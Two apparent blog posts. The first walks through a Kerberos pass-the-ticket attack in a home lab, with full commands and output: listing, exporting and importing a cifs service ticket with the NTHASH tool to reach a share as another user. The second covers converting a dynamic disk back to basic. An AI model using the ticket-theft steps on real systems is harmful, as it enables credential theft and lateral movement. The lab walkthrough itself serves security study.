Oct 312022
 

We will be discussing privilege escalation and/or lateral movement.

The theory.

You got yourself access to a host where other users (preferably local or domain admins) are logged on?

Lets:
-List the kerberos ticket(s) with nthash-win64 /klist
-Export the tgs ticket with nthash-win64 /ask /input:service/fqdn
-Import (in another session, or another host) the (preferably tgs) ticket with nthash-win64 /binary:ticket.kirbi

Note 1 : an admin can touch on all tickets (pass on the luid parameter on)
Note 2 : if the host2/attacker is a domain joined computer, a tgt ticket may be enough (your host « should » handle the tgs when you request a service)
Note 3 : this is not about requesting/forging a ticket (see rubeus) but about stealing a ticket

Practical example.

On host1/victim, we can witness that the logged on user (user1) has access to a remote share.

dir \\WIN-BBC4BS466Q5.home.lab\temp
Le volume dans le lecteur \WIN-BBC4BS466Q5.home.lab\temp n’a pas de nom.
Le numéro de série du volume est 763C-BB7B

Répertoire de \WIN-BBC4BS466Q5.home.lab\temp

20/02/2022 21:21 .
20/02/2022 21:21 ..
27/07/2022 17:09 1 313 792 NTHASH-win64.exe
1 fichier(s) 1 313 792 octets
2 Rép(s) 971 288 576 octets libres

And indeed, there is a ticket which we may want to steal (cifs/WIN-BBC4BS466Q5.home.lab).

nthash-win64.exe /klist
NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:32
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:krbtgt/home.lab
Client Name:user1
Flags:40E10000

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000

Lets export this ticket to a file (which we will be importing later on).

nthash-win64.exe /ask /input:cifs/WIN-BBC4BS466Q5.home.lab
NTHASH 1.8 x64 by erwan2212@gmail.com
Asking for: cifs/WIN-BBC4BS466Q5.home.lab
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewUntil:07/11/2022 16:26:32
ServiceName: cifs/WIN-BBC4BS466Q5.home.lab
ClientName: user1
Flags: 40A50000
KeyType: 00000012
Key:C569A92747E0972A624943E4D99EF1D6BC7CADC7E379E928179BDE816DB419A3
TicketEncType: 00000012
Ticket:6182040630820402A003020105A10A1B08484F4D452E4C4142A22B3029A00302

* KiRBi to file:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi

On host2/attacker, we witness that we do not have (yet) access to the target remote share.

dir \\WIN-BBC4BS466Q5.home.lab\temp
Le nom d’utilisateur ou le mot de passe est incorrect.

Lets import our ticket (exported in previous step).

NTHASH-win64.exe /ptt /binary:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi
NTHASH 1.8 x64 by erwan2212@gmail.com
Ticket successfully submitted for current session

Lets confirm that our ticket now appears in our current (attacker) session.

NTHASH-win64.exe /klist
NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000

Lets now finally confirm that we do have access to the remote share (although we are not impersonating the original « user1 » , nor do we know user1 password).

dir \WIN-BBC4BS466Q5.home.lab\temp
Le volume dans le lecteur \WIN-BBC4BS466Q5.home.lab\temp n’a pas de nom.
Le numéro de série du volume est 763C-BB7B

Répertoire de \WIN-BBC4BS466Q5.home.lab\temp

20/02/2022 21:21 .
20/02/2022 21:21 ..
27/07/2022 17:09 1 313 792 NTHASH-win64.exe
1 fichier(s) 1 313 792 octets
2 Rép(s) 971 296 768 octets libres

Oct 092022
 

You have settled a new disk as « dynamic disk » and now you want to go back to basic disk.

But the option is grayed out in the windows disk manager console.

Lets see how to revert to basic disk without losing data, with CloneDisk.

This procedure applies to a MBR disk but a similar procedure can be performed on GPT disk.

Warning here : if you work on a production disk/system, please do a backup/snapshot to eventually be able to roll back your changes.

First you want to check the partition table : indeed, you do need a partition table to perform this operation and if your disk is a « data » disk, i.e not a « system » disk, your dynamic disk most probably does not have a partition table to match your existing volumes.

See the below screenshots :

-we have 2 disks (0 & 1) : one basic (system) and one dynamic (data)

-we have 4 volumes (2 on each disk)

-second disk (disk 1) does not have a partition table reflecting its volumes (since it is a dynamic disk)

You need to use the « RETAIN » diskpart command to instruct your system to create a partition table for your volumes.

Note that most probably you would not need to perform this task if your disk is a « system » one (partition table will have been taken care of already by the system).

Now, lets have a look at the partition table again.

Much better 🙂

Now lets change the partition type for all partition (0x42 indicating a dynamic disk).

We will change our partitions (here number 4 and 2) to 0x7 aka IFS (for NTFS) and we will hide « dummy » partitions (a left over from the dynamic disk) to 0x17 aka Hidden IFS.

And we will do a offline/online to force the system to refresh its disk (we could/should actually also have performed this change offline and go online once done).

Now lets check our disk management console again and « tada » : our dynamic disk was reverted back to a basic disk 🙂